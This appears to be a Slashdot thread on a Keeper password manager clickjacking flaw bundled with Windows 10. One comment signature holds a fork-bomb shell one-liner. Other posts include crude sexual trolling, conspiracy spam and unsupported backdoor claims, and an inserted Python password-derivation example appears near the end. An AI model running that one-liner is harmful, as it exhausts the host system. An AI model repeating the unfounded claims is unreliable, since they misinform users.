Windows 10 Bundled a Password Manager with a Security Flaw (bleepingcomputer.com)
An anonymous reader writes: A Google security researcher has found and helped patch a severe vulnerability in Keeper, a password manager application that Microsoft has been bundling with some Windows 10 distributions this year... "This is a complete compromise of Keeper security, allowing any website to steal any password," Tavis Ormandy, the Google security researcher said, pointing out that the password manager was still vulnerable to the same vulnerability he reported in August 2016, which had apparently been reintroduced in the code.
Based on user reports, Microsoft appears to have been bundling Keeper as part of Windows 10 Pro distributions since this past summer.
The article reports that Keeper issued a fix -- browser extension version 11.4 -- within less than 24 hours.
Bundled a Windows operating system with numerous security flaws.
So.. rename it "Giver"?
I don't trust atoms -- they make up stuff.
You keep using that word, I do not think it means what you think it means.
Try: "Feature".
There is no way this was not by design. Twice.
#fakenews
Seems to me that a lot of these types of breaches may be intentional due to pressure from agencies who want the ability to spy on users and don't care what the repercussions are. Patch published breaches and create another one when things quiet down.
Just collecting all user info is not enough money making power? :-)
Sell the control of all user passwords (and who knows what else) in the world to some third party company?
And if public gets angered that company would be the scapegoat? Nice
Flaw? You mean "backdoor", created at the behest of one or more intelligence agencies?
....but we still can't write small password keeper programs correctly yet. But somehow AI is going to happen.
You mean the same way that Lennart Poettering treats the entire Linux community?
Windows 10 IS IN ITSELF a MAJOR security flaw... I think it's too precious to call out one tiny piece of Windows 10 and complain about its security flaw.... Of course I will be ruthlessly downmodded by the Windows astroturfing squad... Do your worst, as MOST of us with half a clue know I'm right...
THANK YOU, Edward Snowden!! Americans owe you a debt of gratitude (whether they know it or not..)
...I bet that was a "feature", too...
I mean, seriously, a 'Password Manager' of any type just has a big fat f_cking bullseye painted on it.
Shame on anyone for using any electronic/software based one.
Obviously a feature: https://imgur.com/gallery/bmQW...
See subject line.
Just cruising through this digital world at 33 1/3 rpm...
It's from Porter Industries, with fancy new headquarters in the basement of Lubyanka Square, Moscow.
PorterPass : At least you know the NSA won't be spying on your passwords!
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
The irony is strong in this one.
You do not have a moral or legal right to do absolutely anything you want.
'cause I like humping your mommy
and getting caught by your dad.
If you're not into poota
and you have half a nad.
If you like humping butts at midnight
in the smooth anal gape
Then i'm the one that you searched for
come to me and assrape!
-Helen Gurley Brown
cause it aint
LINEUCKS
or
OHHH ESSS EX
amirite?
"I've heard of Keeper, I remember filing a bug a while ago about how they were injecting privileged UI into pages," said Tavis Ormandy, the Google security researcher who discovered the recent vulnerability.
Looks like Keeper is installed, but the user needs to somehow "login" to Keeper for this flaw to trigger. Then it injects some privileged UI into pages, it says. A malicious site can use clickjacking to steal passwords.
Looks like the victim should login to Keeper, and then visit a malicious website. Not clear whether it is adding this privileged UI only into Edge/Internet Explorer or if it is injecting it into Chrome and Firefox as well.
If Chrome/Firefox users are not affected, this gives one more reason to stay away from IE/Edge.
sed -e 's/Chuck Norris/Rajnikant/g' joke > fact
Wait, so you would rather have spyware, advertising, forced bugdates, forced reboots and no control over your computer rather than use a simple bootstrap that you don't like?
Also, you're operating under a very apparent mentality of lock-down and lock-in imposed by Microsoft and that you aren't even consciously aware of. It's Linux. You can change it.
Trusting Microsoft was your first mistake. I don't trust those idiots to do anything. I wait years between upgrading Windows OS (no choice but to use MS due to critical software). I was on XP for years, finally upgraded to 7. I have no intention of going to Windows 10 until security updates for Windows 7 expire. I worry that with the update treadmill of Windows 10, it may turn out to be a perpetual bug cluster F*** since they can always just push out a new patch to fix what they broke in the last one.
The most secure way to store your passwords is on a piece of paper next to your computer. For added security, abbreviate the parts of the password with a reminder rather than the actual part, so that only you can decode the reminder and create the actual password. The odds of someone breaking into your house, being interested in your password list and further figuring out your password hints to reconstruct your actual password are so minuscule as to be essentially zero. The odds of some organization that you use being hacked and compromising your information or login and password are far more likely.
Until we start taking hacking more seriously: criminal charges for negligent security at corporations (i.e. not using best practices) and heavy corporate fines on a per victim level, and life sentences with no parole, etc. for hackers and black bagging non-extradition offenders (or just blocking/blacklisting non-extradition/bad actor countries), the hacking epidemic will continue to grow.
If you disagree, please post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like
I have never trusted, and will never trust, password managers.
I applied the power of my brain to the task of inventing my own system for managing the large number of passwords that are now a part of ordinary life. And I am not an idiot, so I didn't do stupid things like re-use the same password, keep them all stored in a .txt document, etc.
Mine is a good system. To whoever is reading this: yours can be too. Unless you are an idiot, of course, in which case it is my sincere hope that your inability to protect yourself online has such a severe impact on your social life that it winds up limiting your opportunities to breed.
Gotta love that slashdot censorship system. Completely destroys the continuity of any discussion.
https://it.slashdot.org/comments.pl?sid=11492651&cid=55755393
And the salt in the wounds:
It does nothing to deter the real spammers, so why bother? (This is a rhetorical question, I know that the censorship system has nothing to do with spammers and trolls and everything to do with controlling discussion without appearing to do so.)
(P.S. I will not register so that I can be banned by other users, despite what whiplash says, this is how slashdot works, since the beginning)
See subject & take action by implementing real security on your computer. Virtually everyone who tries my security software agrees that it's outstanding. There are NUMEROUS testimonials from Slashdot users that I've posted many times and been modded up 1,000++ times for.
If you want a similar level of security offline, demand that your government BANS BUMP STOCKS IMMEDIATELY. Banning bump stocks is the ONLY way to prevent future mass shootings like the Las Vegas shooting.
The Vatican doesn't want bump stocks banned & is spending millions of dollars to LOBBY AGAINST banning bump stocks. The VAST FORTUNE of the Vatican was obtained through illicit means including funding wars in Europe. The tradition of using VIOLENCE to grow the wealth of the Vatican is alive and well. Collectively, the Vatican, George Soros, and the NRA, are fighting (figuratively, I hope) to keep them legal. Jesus Christ is ROLLING IN HIS GRAVE.
* Moderators will undoubtedly attempt to censor my post to -1. This censorship is wrong and is probably paid for by the Vatican. It's no better than Hillary Clinton and the DNC paying shills to support George Soros and spread conspiracy theories about Russia. Slashdot must ultimately ELIMINATE MODERATION.
Good posts (like this one) keep ending up at -1, and it makes Slashdot IMPOSSIBLE to read. Moderation (censorship) is RUINING this site. The moderation system has become a means for enforcing groupthink and SILENCING users like Creimer who become unpopular with a small group of MORONS with mod points. Once their karma is depleted by the ABUSE, they can only post twice a day, and at a score of -1. I post anonymously so my imposters can't silence me in the same manner. Otherwise, I would no doubt be their next victim based on the amount of abuse I take.
Most of the abuse is because I won't OpenSORES my Hosts File Engine. JEALOUS LOSERS are angry they can't PIRATE my code and because I tell the TRUTH about them in my posts. Most are angry because they keep DESTROYING themselves against me. It's really quite sad and pathetic.
APK
P.S.=> Idiots like AssFux(lol) have no courage. They will keep censoring my posts and making false statements about me. I circumvent their feeble efforts with my Hosts File Engine. Incidentally, it's also FAR more secure than OpenSSH can ever hope to be... apk
Even with all those false statements, he is still one of the most honest men in Washington. Let's not even get started on news stations.
If it is still UN-patched one has to assume it is by design..
"Censorship"
Hmmmmmmm.
Microsoft's Password Explorer (TM)
Allows everyone on the Internet to explore your passwords.
Sometimes you can make a password management system that takes your single secret password (or a keyfile), adds the host name and the username, tosses it through a SHA-512 HMAC, then uses the first n characters, n being the max the site allows. The nice thing about this method is that the password can't be figured out even if an attacker gets your site passwords.
My ideal password manager would be one that synced to a cloud provider, but had each device have its own private key, and a record so it can unlock and decrypt the master database key. A symmetric key would also be present for recovery reasons. This way, even if the cloud provider were hacked, there would be the database, and a bunch of entries encrypted to a number of public keys, forcing the attacker to either try to factor one of the keys, or go against the entire AES-256 keyspace [1]. Since Windows, Linux, macOS, Android, and iOS all have OS level protection mechanisms for keys, one can use those for device protection.
[1]: Or if one wants to up security a notch, cascade AES, SERPENT, and some other Russian/Chinese standard algorithms. This isn't to brag about having 1024 bits of key space, but in case one of the main algorithms has a significant weakness, the data is still protected. This is why VeraCrypt offers a two and three algorithm cascade.
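The HMAC-derived per-site password scheme described above (master secret plus host name and username through HMAC-SHA512, truncated to the site's maximum length), as an added example and not the commenter's own code. NUL separators between the fields, a rotation counter, base64 output and a PBKDF2 step for turning a passphrase into the master secret are all assumptions added here.

```python
import base64
import hashlib
import hmac

# Base64 of a 64-byte SHA-512 digest is 88 chars, 86 once '=' padding is stripped.
MAX_DERIVED_LEN = 86


def derive_site_password(master_secret: bytes, host: str, username: str,
                         max_len: int, counter: int = 0) -> str:
    """Deterministically derive a per-site password from one master secret.

    HMAC-SHA512(master_secret, host || username || counter), base64-encoded and
    truncated to the site's maximum length. The NUL separators are an added
    detail: they keep ("ab", "c") from colliding with ("a", "bc"). The counter
    (also added) lets one site's password be rotated without a new master secret.
    """
    if not 1 <= max_len <= MAX_DERIVED_LEN:
        raise ValueError(f"max_len must be between 1 and {MAX_DERIVED_LEN}")
    # Normalise the host so "Example.COM" and "example.com" derive the same value.
    message = b"\x00".join([host.strip().lower().encode("utf-8"),
                            username.encode("utf-8"),
                            str(counter).encode("ascii")])
    digest = hmac.new(master_secret, message, hashlib.sha512).digest()
    encoded = base64.b64encode(digest).decode("ascii").rstrip("=")
    return encoded[:max_len]


def master_secret_from_passphrase(passphrase: str, keyfile: bytes = b"",
                                  iterations: int = 600_000) -> bytes:
    """Turn a passphrase (and optional keyfile) into the 64-byte HMAC key.

    Assumed design: PBKDF2 makes offline guessing of the passphrase slow, and
    the keyfile, when present, acts as the salt so both are needed to rebuild
    the master secret.
    """
    salt = hashlib.sha256(keyfile).digest() if keyfile else b"hmac-site-password-v1"
    return hashlib.pbkdf2_hmac("sha512", passphrase.encode("utf-8"), salt, iterations)


if __name__ == "__main__":
    # Constructed sample passphrase; real use would read it from the user.
    secret = master_secret_from_passphrase("correct horse battery staple")
    for site in ("example.com", "bank.example"):
        print(site, derive_site_password(secret, site, "alice", max_len=20))
```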
#realnews